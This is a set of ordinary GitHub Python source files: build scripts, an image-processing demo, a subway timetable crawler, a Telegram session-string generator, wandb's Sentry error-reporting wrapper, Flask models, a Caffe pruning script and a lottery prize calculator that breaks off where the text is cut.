+{"seq_id":"20506086182","text":"import sys\nimport os\nimport shutil\nfrom jsmin import jsmin\n\nis_release = False\n\ndef minifie(src, dest):\n if is_release:\n with open(src) as input:\n minified = jsmin(input.read())\n output = open(dest, 'w+')\n output.write(minified)\n output.close()\n else:\n shutil.copy2(src, dest)\n\ndef main():\n global is_release\n\n if len(sys.argv) == 2:\n if sys.argv[1] == \"release\":\n is_release = True\n elif sys.argv[1] == \"test\":\n os.system(\"cargo test && wasm-pack test --node\")\n return\n\n if not os.path.exists(\"build\"):\n os.makedirs(\"build\")\n\n os.system(\"wasm-pack build --no-typescript --target no-modules \" +\n (\"--release\" if is_release else \"\"))\n shutil.copy2(\"pkg/roguelike_bg.wasm\", \"build/roguelike_bg.wasm\")\n minifie(\"pkg/roguelike.js\", \"build/roguelike.js\")\n\n shutil.copy2(\"index.html\", \"build/index.html\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"eeli1/roguelike","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73950872427","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom deep_dream import deep_dream\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--img_file\", type=str, default=\"images/supermarket.jpg\", help=\"path to input image\")\n parser.add_argument(\"--iterations\", default=20, help=\"number of gradient ascent steps per octave\")\n parser.add_argument(\"--at_layer\", default=27, type=int, help=\"layer at which we modify image to maximize outputs\")\n parser.add_argument(\"--lr\", default=0.01, help=\"learning rate\")\n parser.add_argument(\"--octave_scale\", default=1.4, help=\"image scale between octaves\")\n parser.add_argument(\"--num_octaves\", default=10, help=\"number of octaves\")\n\n return parser.parse_args()\n\n\ndef main(\n img_file: str,\n iterations: int,\n at_layer: int,\n lr: float,\n octave_scale: float,\n num_octaves: int,\n):\n # Load image\n img = np.asarray(Image.open(img_file))\n\n # Extract deep dream image\n dreamed_image = deep_dream(\n img,\n at_layer=at_layer,\n iterations=iterations,\n lr=lr,\n octave_scale=octave_scale,\n num_octaves=num_octaves,\n )\n\n # Save and plot image\n os.makedirs(\"outputs\", exist_ok=True)\n filename = args.img_file.split(\"/\")[-1]\n plt.figure(figsize=(20, 20))\n plt.imshow(dreamed_image)\n plt.imsave(f\"outputs/dreamed_{filename}\", dreamed_image)\n plt.show()\n\n\nif __name__ == \"__main__\":\n args = get_args()\n main(**vars(args))\n\n","repo_name":"haruishi43/deepdream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35640340819","text":"# I assume formatting the dictionary in this way is ok. I create objects this way in JavaScript.\nCOLOURS = {\n \"AliceBlue\": \"#f0f8ff\",\n \"Beige\": \"#f5f5dc\",\n \"Black\": \"#ffffff\",\n \"BlueViolet\": \"#8a2be2\",\n \"Coral\": \"#ff7f50\",\n \"DarkGreen\": \"#006400\",\n \"Gold1\": \"#ffd700\",\n \"Gray\": \"#bebebe\",\n \"HotPink\": \"#ff69b4\",\n \"Magenta\": \"#ff00ff\"\n}\n\nfor colour in COLOURS:\n max_length = max([len(colour) for colour in COLOURS])\n print(f\"The hex code for {colour:{max_length}} is {COLOURS[colour]}\")\n\ncolour_name = input(\"Enter colour name: \")\nwhile colour_name != \"\":\n valid = False\n for colour in COLOURS:\n if colour_name.upper() == colour.upper():\n print(COLOURS[colour])\n valid = True\n if valid == False:\n print(\"That is not a valid colour. Please try again.\")\n colour_name = input(\"Enter colour name: \")\n\nprint(\"Exiting program\")","repo_name":"FinOCE/CP1404","sub_path":"prac_05/hex_colours.py","file_name":"hex_colours.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"19371131982","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef crawling(station_code):\n\n url = 'http://www.seoulmetro.co.kr/kr/getStationInfo.do?action=time&stationId=' + str(station_code )\n # 서울메트로 접속후 post방식으로 크롤링\n\n response = requests.get(url)\n\n if response.status_code == 200:\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n else :\n print(response.status_code)\n\n filter_data = soup.find_all('a')\n filter_data2 = soup.find_all('li')\n\n types = [] # 급행인지 일반인지(일반, 급행)\n times = [] # 시간(시:분) \n weeks = [] # 1: 평일, 2: 주말, 3: 공휴일\n destinations = [] # 도착지(ex. 청량리행, 천안행, 구로행 등)\n\n \n for i in filter_data:\n try:\n strings = i.get_text().split()\n times.append(i['time'] + ':' + strings[0][:-1])\n \n if i['week'] == '1':\n weeks.append('평일')\n elif i['week'] == '2':\n weeks.append('주말')\n else:\n weeks.append('공휴일')\n \n destinations.append(strings[-1][:-1])\n \n except:\n continue\n\n for j in filter_data2:\n try:\n if j['class'][0]=='G':\n types.append('일반')\n elif j['class'][0]=='D':\n types.append('급행')\n except:\n continue\n \n\n return types, times, weeks, destinations\n\ndef real_time_subway_location(location):\n url = 'http://swopenAPI.seoul.go.kr/api/subway/544f6a5a766b6b73313036426657754f/json/realtimeStationArrival/0/10/' + location\n\n response = requests.get(url)\n src = response.text\n src_json = json.loads(src)\n\n updnline = [] # 상행, 하행\n bstatnNm = [] # 도착역\n cur_loc = [] # 현재 위치\n arvlCd = [] # 현재 열차의 상태(0:진입, 1:도착, 2:출발, 3:전역출발, 4:전역진입, 5:전역도착, 99:운행중)\n\n\n for row in src_json['realtimeArrivalList']:\n updnline.append(row['updnLine'])\n bstatnNm.append(row['bstatnNm'])\n cur_loc.append(row['arvlMsg3'])\n arvlCd.append(row['arvlCd'])\n \n return updnline, bstatnNm, cur_loc, arvlCd\n\n\ndef main():\n crawling_data = crawling(1408)\n api_data = real_time_subway_location('신창')\n \n crawling_data_json = {\n 'types' : crawling_data[0],\n 'times' : crawling_data[1],\n 'weeks' : crawling_data[2],\n 'destinations' : crawling_data[3]\n }\n \n api_data_json = {\n 'updnline' : api_data[0],\n 'bstatnNm' : api_data[1],\n 'cur_loc' : api_data[2],\n 'arvlCd' : api_data[3]\n }\n \n crawling_data_json = json.dumps(crawling_data_json, indent = 4, ensure_ascii = False)\n api_data_json = json.dumps(api_data_json, indent = 4, ensure_ascii = False)\n \n return crawling_data_json, api_data_json\n\n\nif __name__ == \"__main__\":\n main_json = main()\n# 신창역 코드: 1408","repo_name":"0001010/Learn-Growth","sub_path":"Crawling/Seoul_Metro_Line1_Schedule(Sinchang).py","file_name":"Seoul_Metro_Line1_Schedule(Sinchang).py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19993175649","text":"import glob\nimport os\nimport re\nimport json\n\n\nclass OverrideFileInfo:\n\n def __init__(self, override_file_paths, repo_root_path):\n self.override_file_paths = override_file_paths\n self.repo_root_path = repo_root_path\n self._label_to_fq_label = self._build_name_to_override_dependencies()\n\n @property\n def label_to_overridden_fq_label(self):\n return self._label_to_fq_label\n\n def _build_name_to_override_dependencies(self):\n \"\"\"\n Returns a dict for all overrides dependencies\n\n The mapping is of the form: {dep: overridden_dep}\n \"\"\"\n override_file_names_and_paths = self._get_override_file_names_and_paths()\n if override_file_names_and_paths == 0:\n return {}\n overrides_dict = {}\n for (_, fpath) in override_file_names_and_paths:\n parsed_data = self._parse_override_file(fpath)\n overrides_dict.update(parsed_data)\n return overrides_dict\n\n def _get_override_file_names_and_paths(self):\n \"\"\"\n Returns a list of tuples (override file name, override file path)\n \"\"\"\n names_and_paths = []\n for rel_path in self.override_file_paths:\n path = os.path.join(self.repo_root_path, rel_path)\n name_and_path = self._process_path(path)\n if name_and_path is None:\n globbed_names_and_paths = []\n if \"*\" in path:\n for path in glob.glob(path):\n name_and_path = self._process_path(path)\n if name_and_path is not None:\n globbed_names_and_paths.append(name_and_path)\n names_and_paths += sorted(globbed_names_and_paths)\n else:\n raise Exception(\"override file path not found [%s]\" % path)\n else:\n names_and_paths.append(name_and_path)\n return names_and_paths\n\n def _parse_override_file(self, file_path):\n \"\"\"\n Returns a dict of {dep: overridded_dep} mapping\n \"\"\"\n with open(file_path, \"r\") as f:\n contents = f.read()\n\n # Removes comments\n contents = re.sub(\"#.*\\n\", \"\", contents).split(\"{\")[1].split(\"}\")[0]\n\n # Removes whitespaces\n contents = re.sub(r'\":\\s+', '\":', contents)\n contents = re.sub(r',\\s+', ',', contents)\n\n # Removes the extra comma if present\n if contents.endswith(\",\"):\n contents = contents[:-1]\n contents = \"{\" + contents.strip() + \"}\"\n override_data = json.loads(contents)\n output = {}\n\n # Updates /, . and - with _\n # Example - org.springframework:spring-jcl to org_springframework_spring_jcl\n for dep, overridded_dep in override_data.items():\n pattern = r'(?<=[^\\d])\\.|\\.(?=[^\\d])'\n output[re.sub(pattern, \"_\", dep.replace(':', '_').replace(\"-\", \"_\"))] = overridded_dep\n return output\n\n def _process_path(self, path):\n \"\"\"\n Returns a tuple (override file name, override file path) or None\n if the specified path is invalid.\n \"\"\"\n override_file_suffix = \".bzl\"\n if os.path.exists(path):\n fname = os.path.basename(path)\n if fname.endswith(override_file_suffix):\n return (fname[:-len(override_file_suffix)], path)\n return None\n","repo_name":"simontoens/pomgen","sub_path":"common/overridefileinfo.py","file_name":"overridefileinfo.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"74974945386","text":"import colorama\nfrom colorama import Fore, Style\nfrom pyrogram import Client\nfrom telethon.sessions import StringSession\nfrom telethon.sync import TelegramClient\n\ncolorama.init(autoreset=True)\nAKSHITBOT_PIC = \"https://telegra.ph/file/8488fc6758ff283061324.jpg\"\n\n\nokbro = input(\"Enter y or yes continue: \")\n\nif okbro == \"y\" or \"yes\":\n print(\n Fore.GREEN\n + Style.BRIGHT\n + \"\"\"\\t\\t\n\n╭━━━┳╮╱╱╱╱╭╮╱╱╭╮╭╮╱╱╱╱╭╮\n┃╭━╮┃┃╱╱╱╱┃┃╱╭╯╰┫┃╱╱╱╭╯╰╮\n┃┃╱┃┃┃╭┳━━┫╰━╋╮╭┫╰━┳━┻╮╭╯\n┃╰━╯┃╰╯┫━━┫╭╮┣┫┃┃╭╮┃╭╮┃┃\n┃╭━╮┃╭╮╋━━┃┃┃┃┃╰┫╰╯┃╰╯┃╰╮\n╰╯╱╰┻╯╰┻━━┻╯╰┻┻━┻━━┻━━┻━╯\n \"\"\"\n )\n print(\"\\nChoose String Type \\n1.Telethon\\n2.Pyrogram\")\n library = input(\"\\nYour Choice:\")\n if library == \"1\":\n print(\"Welcome To Telethon String Generator\")\n APP_ID = int(input(\"Enter APP ID - \"))\n API_HASH = input(\"Enter API HASH - \")\n try:\n with TelegramClient(StringSession(), APP_ID, API_HASH) as bot:\n string_session = bot.session.save()\n print(\n \"You can Get Your String Session In Saved Message of Your Telegram Account. Remember To Make New String Session Whenever You Terminate Sessions.\"\n )\n bot.send_file(\n \"me\",\n AKSHITBOT_PIC,\n caption=f\"`{string_session}`\\n\\n• __Dont Share String Session With Anyone__\\n• __Dont Invite Anyone To Heroku__\",\n )\n except Exception as e:\n print(f\"{e}\")\n elif library == \"2\":\n print(\"Welcome To Pyrogram String Session\")\n APP_ID = int(input(\"\\nEnter Ur APP ID ~: \"))\n API_HASH = input(\"\\nEnter Ur API_HASH ~: \")\n try:\n with Client(\":memory:\", api_id=APP_ID, api_hash=API_HASH) as boy:\n sweetie = boy.export_session_string()\n print(\n \"Successfully Pyrogram String Session Has Been Generated \\nCheck Ur Saved Message \\nIf U Terminate Sessions Then U Have To Generate Gain\\nDont Try To Share STRING SESSION with Anyone\"\n )\n boy.send_message(\"me\", f\"Pyrogram String Session\\n\\n`{sweetie}`\")\n except Exception as e:\n print(f\"{e}\")\n else:\n print(\n \"\\nohh sorry Ab Fir Se Start karo & \\nChoose 1 For Userbot \\nChoose 2 For Pyrogram \\n Pahle Run karo fir se Tab 1 ya 2 Koi Ek Select Karna\"\n )\n","repo_name":"akshitbhatia2004/USERBOT-BY-AKSHIT","sub_path":"AkshitString.py","file_name":"AkshitString.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8395832611","text":"__all__ = (\"Sentry\",)\n\n\nimport atexit\nimport functools\nimport os\nimport pathlib\nimport sys\nfrom types import TracebackType\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, Optional, Tuple, Type, Union\nfrom urllib.parse import quote\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\nimport sentry_sdk # type: ignore\nimport sentry_sdk.utils # type: ignore\n\nimport wandb\nimport wandb.env\nimport wandb.util\n\nif TYPE_CHECKING:\n import wandb.sdk.internal.settings_static\n\nSENTRY_DEFAULT_DSN = (\n \"https://2592b1968ea94cca9b5ef5e348e094a7@o151352.ingest.sentry.io/4504800232407040\"\n)\n\nSessionStatus = Literal[\"ok\", \"exited\", \"crashed\", \"abnormal\"]\n\n\ndef _safe_noop(func: Callable) -> Callable:\n \"\"\"Decorator to ensure that Sentry methods do nothing if disabled and don't raise.\"\"\"\n\n @functools.wraps(func)\n def wrapper(self: Type[\"Sentry\"], *args: Any, **kwargs: Any) -> Any:\n if self._disabled:\n return None\n try:\n return func(self, *args, **kwargs)\n except Exception as e:\n # do not call self.exception here to avoid infinite recursion\n if func.__name__ != \"exception\":\n self.exception(f\"Error in {func.__name__}: {e}\")\n return None\n\n return wrapper\n\n\nclass Sentry:\n _disabled: bool\n\n def __init__(self) -> None:\n self._disabled = not wandb.env.error_reporting_enabled()\n self._sent_messages: set = set()\n\n self.dsn = os.environ.get(wandb.env.SENTRY_DSN, SENTRY_DEFAULT_DSN)\n\n self.hub: Optional[sentry_sdk.hub.Hub] = None\n\n # ensure we always end the Sentry session\n atexit.register(self.end_session)\n\n @property\n def environment(self) -> str:\n \"\"\"Return the environment we're running in.\"\"\"\n # check if we're in a git repo\n is_git = pathlib.Path(__file__).parent.parent.parent.joinpath(\".git\").exists()\n\n # these match the environments for gorilla\n return \"development\" if is_git else \"production\"\n\n @_safe_noop\n def setup(self) -> None:\n \"\"\"Setup Sentry SDK.\n\n We use lower-level APIs (i.e., not sentry_sdk.init) here\n to avoid the possibility of interfering with the user's\n own Sentry SDK setup.\n \"\"\"\n client = sentry_sdk.Client(\n dsn=self.dsn,\n default_integrations=False,\n environment=self.environment,\n release=wandb.__version__,\n )\n self.hub = sentry_sdk.Hub(client)\n\n @_safe_noop\n def message(self, message: str, repeat: bool = True) -> None:\n \"\"\"Send a message to Sentry.\"\"\"\n if not repeat and message in self._sent_messages:\n return\n self._sent_messages.add(message)\n self.hub.capture_message(message) # type: ignore\n\n @_safe_noop\n def exception(\n self,\n exc: Union[\n str,\n BaseException,\n Tuple[\n Optional[Type[BaseException]],\n Optional[BaseException],\n Optional[TracebackType],\n ],\n None,\n ],\n handled: bool = False,\n status: Optional[\"SessionStatus\"] = None,\n ) -> None:\n \"\"\"Log an exception to Sentry.\"\"\"\n error = Exception(exc) if isinstance(exc, str) else exc\n # based on self.hub.capture_exception(_exc)\n if error is not None:\n exc_info = sentry_sdk.utils.exc_info_from_error(error)\n else:\n exc_info = sys.exc_info()\n\n event, hint = sentry_sdk.utils.event_from_exception(\n exc_info,\n client_options=self.hub.client.options, # type: ignore\n mechanism={\"type\": \"generic\", \"handled\": handled},\n )\n try:\n self.hub.capture_event(event, hint=hint) # type: ignore\n except Exception:\n pass\n\n # if the status is not explicitly set, we'll set it to \"crashed\" if the exception\n # was unhandled, or \"errored\" if it was handled\n status = status or (\"crashed\" if not handled else \"errored\") # type: ignore\n self.mark_session(status=status)\n\n client, _ = self.hub._stack[-1]\n client.flush()\n\n return None\n\n def reraise(self, exc: Any) -> None:\n \"\"\"Re-raise an exception after logging it to Sentry.\n\n Use this for top-level exceptions when you want the user to see the traceback.\n\n Must be called from within an exception handler.\n \"\"\"\n self.exception(exc)\n # this will messily add this \"reraise\" function to the stack trace,\n # but hopefully it's not too bad\n raise exc.with_traceback(sys.exc_info()[2])\n\n @_safe_noop\n def start_session(self) -> None:\n \"\"\"Start a new session.\"\"\"\n assert self.hub is not None\n # get the current client and scope\n _, scope = self.hub._stack[-1]\n session = scope._session\n\n # if there's no session, start one\n if session is None:\n self.hub.start_session()\n\n @_safe_noop\n def end_session(self) -> None:\n \"\"\"End the current session.\"\"\"\n assert self.hub is not None\n # get the current client and scope\n client, scope = self.hub._stack[-1]\n session = scope._session\n\n if session is not None and client is not None:\n self.hub.end_session()\n client.flush()\n\n @_safe_noop\n def mark_session(self, status: Optional[\"SessionStatus\"] = None) -> None:\n \"\"\"Mark the current session with a status.\"\"\"\n assert self.hub is not None\n _, scope = self.hub._stack[-1]\n session = scope._session\n\n if session is not None:\n session.update(status=status)\n\n @_safe_noop\n def configure_scope(\n self,\n tags: Optional[Dict[str, Any]] = None,\n process_context: Optional[str] = None,\n ) -> None:\n \"\"\"Configure the Sentry scope for the current thread.\n\n This function should be called at the beginning of every thread that\n will send events to Sentry. It sets the tags that will be applied to\n all events sent from this thread. It also tries to start a session\n if one doesn't already exist for this thread.\n \"\"\"\n assert self.hub is not None\n settings_tags = (\n \"entity\",\n \"project\",\n \"run_id\",\n \"run_url\",\n \"sweep_url\",\n \"sweep_id\",\n \"deployment\",\n \"_disable_service\",\n \"_require_nexus\",\n \"launch\",\n )\n\n with self.hub.configure_scope() as scope:\n scope.set_tag(\"platform\", wandb.util.get_platform_name())\n\n # set context\n if process_context:\n scope.set_tag(\"process_context\", process_context)\n\n # apply settings tags\n if tags is None:\n return None\n\n for tag in settings_tags:\n val = tags.get(tag, None)\n if val not in (None, \"\"):\n scope.set_tag(tag, val)\n\n if tags.get(\"_colab\", None):\n python_runtime = \"colab\"\n elif tags.get(\"_jupyter\", None):\n python_runtime = \"jupyter\"\n elif tags.get(\"_ipython\", None):\n python_runtime = \"ipython\"\n else:\n python_runtime = \"python\"\n scope.set_tag(\"python_runtime\", python_runtime)\n\n # Construct run_url and sweep_url given run_id and sweep_id\n for obj in (\"run\", \"sweep\"):\n obj_id, obj_url = f\"{obj}_id\", f\"{obj}_url\"\n if tags.get(obj_url, None):\n continue\n\n try:\n app_url = wandb.util.app_url(tags[\"base_url\"]) # type: ignore\n entity, project = (quote(tags[k]) for k in (\"entity\", \"project\")) # type: ignore\n scope.set_tag(\n obj_url,\n f\"{app_url}/{entity}/{project}/{obj}s/{tags[obj_id]}\",\n )\n except Exception:\n pass\n\n email = tags.get(\"email\")\n if email:\n scope.user = {\"email\": email} # noqa\n\n # todo: add back the option to pass general tags see: c645f625d1c1a3db4a6b0e2aa8e924fee101904c (wandb/util.py)\n\n self.start_session()\n","repo_name":"wandb/wandb","sub_path":"wandb/analytics/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
+{"seq_id":"38791436408","text":"from flask_sqlalchemy import SQLAlchemy\nimport datetime\n\ndb = SQLAlchemy()\n\ndef convert_time(time):\n if not time:\n return None\n return time.strftime('%m-%d-%Y %H:%M:%S')\n\nclass User(db.Model):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), nullable=False, unique=True)\n wins = db.relationship('Game', foreign_keys='Game.winner_user_id')\n losses = db.relationship('Game', foreign_keys='Game.loser_user_id')\n\n def __init__(self, name):\n self.name = name\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name\n }\n\n\nclass Game(db.Model):\n __tablename__ = 'game'\n id = db.Column(db.Integer, primary_key=True)\n winner_user_id = db.Column(db.Integer,\n db.ForeignKey('user.id'),\n nullable=False)\n loser_user_id = db.Column(db.Integer,\n db.ForeignKey('user.id'),\n nullable=False)\n start_time = db.Column(db.DateTime)\n end_time = db.Column(db.DateTime, default=datetime.datetime.utcnow())\n\n\n winner_user = db.relationship('User', foreign_keys='Game.winner_user_id')\n losing_user = db.relationship('User', foreign_keys='Game.loser_user_id')\n\n def __init__(self, winning_user=None, losing_user=None,\n winning_user_id=None, loser_user_id=None,\n start_time=None, end_time=None):\n\n if self.winner_user:\n self.winner_user = winning_user\n else:\n self.winner_user_id = winning_user_id\n\n if self.losing_user:\n self.losing_user = losing_user\n else:\n self.loser_user_id = loser_user_id\n\n self.start_time = start_time\n self.end_time = end_time\n\n def to_dict(self, tc=convert_time):\n return {\n 'id': self.id,\n 'start_time': tc(self.start_time),\n 'end_time': tc(self.end_time),\n 'winning_user': self.winner_user.to_dict(),\n 'losing_user': self.losing_user.to_dict()\n }\n","repo_name":"Rastii/BilliardStats","sub_path":"BilliardStats/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"73292930346","text":"'''\nCaffe net-surgery for channel pruning based on L1 norm for simple layers without skip connections\nList of layers needs to be specifed mannually\n\nAuthor: Harshal\nCreated on : 10 July 2019\nModified on: 10 July 2019\n'''\n\nimport caffe\nimport numpy as np\nimport cv2\nfrom caffe.proto import caffe_pb2\n\n# input test image path\nimage_path = '' \ndeploy_prototxt = 'deploy.prototxt' \ndeploy_prototxt_modified = 'deploy_pruned.prototxt' \ncaffemodel = '_iter_500000.caffemodel' \n\ntest_net = caffe.Net(deploy_prototxt, caffemodel, caffe.TEST)\ntest_net_pruned = caffe.Net(deploy_prototxt_modified, caffe.TEST)\n\nlayer_names = list(test_net._layer_names)\nlayers_to_prune = ['res2a_branch2a']\nchannel_to_prune = None\nfor (key, value) in test_net.params.items():\n# for key in ['conv1']:\n layer_type = test_net.layers[layer_names.index(key)].type\n print(layer_type)\n if layer_type == 'Convolution' and key in layers_to_prune:\n W = test_net.params[key][0].data\n print(W.shape)\n L1_norm = np.sum(np.abs(W), axis = (1, 2, 3))\n channel_to_prune = np.argmin(L1_norm)\n print('Pruning channel no. {}, norm {}'.format(channel_to_prune, L1_norm[channel_to_prune]))\n\n temp = np.zeros(W.shape, np.float32)\n np.copyto(temp, W)\n temp = np.delete(temp, channel_to_prune, axis = 0)\n # temp[channel_to_prune, :, :, :] = 0.0\n np.copyto(test_net_pruned.params[key][0].data, temp)\n\n if len(list(test_net.params[key])) == 2: # check if bias paramter is also there\n b = test_net.params[key][1].data\n print(b.shape)\n temp = np.zeros(b.shape, np.float32)\n np.copyto(temp, b)\n temp = np.delete(temp, channel_to_prune, axis = 0)\n # temp[channel_to_prune, :, :, :] = 0.0\n np.copyto(test_net_pruned.params[key][1].data, temp)\n \n else:\n for i in range(len(list(test_net.params[key]))):\n print(test_net.params[key][i].data.shape)\n if channel_to_prune is not None and (i < 2 or layer_type == 'Scale'):\n temp = np.zeros(test_net.params[key][i].data.shape, np.float32)\n np.copyto(temp, test_net.params[key][i].data)\n if layer_type == 'Convolution' and i == 0:\n temp = np.delete(temp, channel_to_prune, axis = 1)\n channel_to_prune = None\n else:\n temp = np.delete(temp, channel_to_prune, axis = 0)\n else:\n np.copyto(test_net_pruned.params[key][i].data, test_net.params[key][i].data)\n\n\ntest_net_pruned.save('_iter_500000_pruned.caffemodel')\n\n# print(test_net.params['conv1'][0].data.shape)\n# print(test_net.params['conv1'][1].data.shape)\n\n\n#--------------------------------------------------------------------------------------------------------------#\ndata_image_1 = cv2.imread(image_path)\n\n# data_image_1[:, :, 0] = data_image_1[:, : , 0].astype('float') - 193.24\n# data_image_1[:, :, 1] = data_image_1[:, : , 1].astype('float') - 107.298\n# data_image_1[:, :, 2] = data_image_1[:, : , 2].astype('float') - 162.016\n\n# data_image_1[:, :, 0] = data_image_1[:, :, 2]\n# data_image_1[:, :, 1] = data_image_1[:, :, 1]\n# data_image_1[:, :, 2] = data_image_1[:, :, 0]\n\ndata_image = np.transpose(data_image_1, (2, 0, 1))\ndata_image = data_image.reshape((1, 3, 512, 512))\n\ntest_net.blobs['data'].data[...] = data_image\ntest_net.forward()\n\n# out_image = test_net.blobs['score'].data\n# out_image = test_net.blobs['deconvFusion_Sem_3'].data\nout_image = test_net.blobs['argmax'].data\nprint(out_image)\n# out_image = out_image.reshape((3, 512, 512))\nout_image = out_image.reshape((512, 512)).astype('uint8')\n\n# out_image = out_image.transpose((1, 2, 0))\nout_image[out_image == 1.0] = 255\n\n# out_image = (out_image - minimum) * 255 / (maximum - minimum)\nprint(out_image)\nprint(data_image.shape)\n\ncv2.imwrite('test_out.png', out_image)\n\ntest_net_pruned.blobs['data'].data[...] = data_image\ntest_net_pruned.forward()\n\n# out_image = test_net.blobs['score'].data\n# out_image = test_net.blobs['deconvFusion_Sem_3'].data\nout_image = test_net_pruned.blobs['argmax'].data\nprint(out_image)\n# out_image = out_image.reshape((3, 512, 512))\nout_image = out_image.reshape((512, 512)).astype('uint8')\n\n# out_image = out_image.transpose((1, 2, 0))\nout_image[out_image == 1.0] = 255\n\n# out_image = (out_image - minimum) * 255 / (maximum - minimum)\nprint(out_image)\nprint(data_image.shape)\n\ncv2.imwrite('test_out_pruned.png', out_image)\n","repo_name":"harshalnishar/caffe_model_pruning","sub_path":"model_pruninig.py","file_name":"model_pruninig.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39982910039","text":"import click\nimport numpy as np\nimport pandas as pd\n\n\n###############################\n# calculate distributed prizes\n\nCUTOFF = pd.to_datetime('2016-01-02')\n\n\ndef get_totalprize13(total_revenue, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.15 / 1.045\n else:\n return total_revenue * 0.400 * 0.7 * 0.15 / 1.045\n\n\ndef get_totalprize14(total_revenue, acc, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.70 / 1.045 + acc\n else:\n return total_revenue * 0.400 * 0.7 * 0.70 / 1.045 + acc\n\n\ndef get_accumulated05(total_revenue, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.15 / 1.045\n else:\n return total_revenue * 0.400 * 0.7 * 0.15 / 1.045\n\n\n##################################\n# core\n\ndef calculate_prizes(df):\n \"\"\"This algorithm will calculate the total amount accumulated and the prizes\n for each Loteca round in the dataset.\n\n Columns added:\n acc13/acc14/acc05: the amount of money this round contributes to the\n next ones (the partial amounts accumulated)\n totalacc: the total amount of money accumulated *for* this round\n total13/total14: the total prize that will be paid to the winners in\n this round\n\n Note:\n Some of the data is not possible to retrieve. In these cases, we set a\n value of np.nan\n\n Returns:\n A new DataFrame with the columns added.\n \"\"\"\n df = df.copy()\n\n # algorithm over the rows\n columns = ['acc13', 'acc14', 'acc05', 'total13', 'total14', 'totalacc']\n for column in columns:\n df[column] = np.nan\n\n for i in df.index:\n # last accumulated 14 rights\n try:\n lastacc13 = df.loc[i - 1, 'acc13']\n except KeyError:\n lastacc13 = np.nan\n\n # last accumulated 13 rights\n try:\n lastacc14 = df.loc[i - 1, 'acc14']\n except KeyError:\n lastacc14 = np.nan\n\n # accumulated for rounds ending in 0 or 5\n if i % 5 == 0:\n values = df.loc[i - 5: i - 1, 'acc05']\n if values.shape[0] == 5:\n lastacc05 = values.sum()\n else:\n lastacc05 = np.nan\n else:\n lastacc05 = 0.0\n\n # total accumulated (for this round)\n totalacc = lastacc13 + lastacc14 + lastacc05\n\n # calculate prizes and stuff\n total_revenue = df.loc[i, 'total_revenue']\n date = df.loc[i, 'date']\n total13 = get_totalprize13(total_revenue, date)\n total14 = get_totalprize14(total_revenue, totalacc, date)\n acc13 = total13 if df.loc[i, 'winners13'] == 0 else 0.0\n acc14 = total14 if df.loc[i, 'winners14'] == 0 else 0.0\n acc05 = get_accumulated05(total_revenue, date)\n\n # assign values\n df.loc[i, 'total13'] = total13\n df.loc[i, 'total14'] = total14\n df.loc[i, 'totalacc'] = totalacc\n df.loc[i, 'acc13'] = acc13\n df.loc[i, 'acc14'] = acc14\n df.loc[i, 'acc05'] = acc05\n\n # only keep rounds where 'totalacc' is present\n df = df[df.totalacc.notnull()]\n\n return df\n\n\ndef process_loteca_rounds(df):\n \"\"\"Process the loteca rounds\n\n 1. Remove rounds without revenue information\n 2. Add bet price information\n 3. Calculate amount of bets per round\n 4. Calculate the total accumulated and total prizes for each round\n 5. Remove rounds where we couldn't compute the total prize or value\n accumulated\n \"\"\"\n # work with a copy\n df = df.copy()\n\n # only keep rounds that contain the revenue\n df = df[df.total_revenue.notnull()]\n\n # add the bet price to count the amount of bets made\n df['betprice'] = 0.5\n df.loc[df.date >= pd.to_datetime('2015-05-18'), 'betprice'] = 1.0\n\n # calculate amount of bets\n df['betcnt'] = df.total_revenue / df.betprice\n df['betcnt'] = df.betcnt.apply(int)\n\n # calculate the prizes\n df = calculate_prizes(df)\n df = df.drop(['acc13', 'acc14', 'acc05'], axis=1)\n\n # remove rounds where we couldn't calculate the total prize or accumulated\n df = df[df.total13.notnull() & df.total14.notnull() & df.totalacc.notnull()]\n\n return df\n\n\n##################################\n# CLI\n\n@click.command()\n@click.argument('in-lotecaf-rounds', type=click.Path(exists=True))\n@click.argument('out-lotecaf-rounds', type=click.Path(writable=True))\ndef save_processed_rounds(in_lotecaf_rounds, out_lotecaf_rounds):\n df = pd.read_pickle(in_lotecaf_rounds)\n df = process_loteca_rounds(df)\n 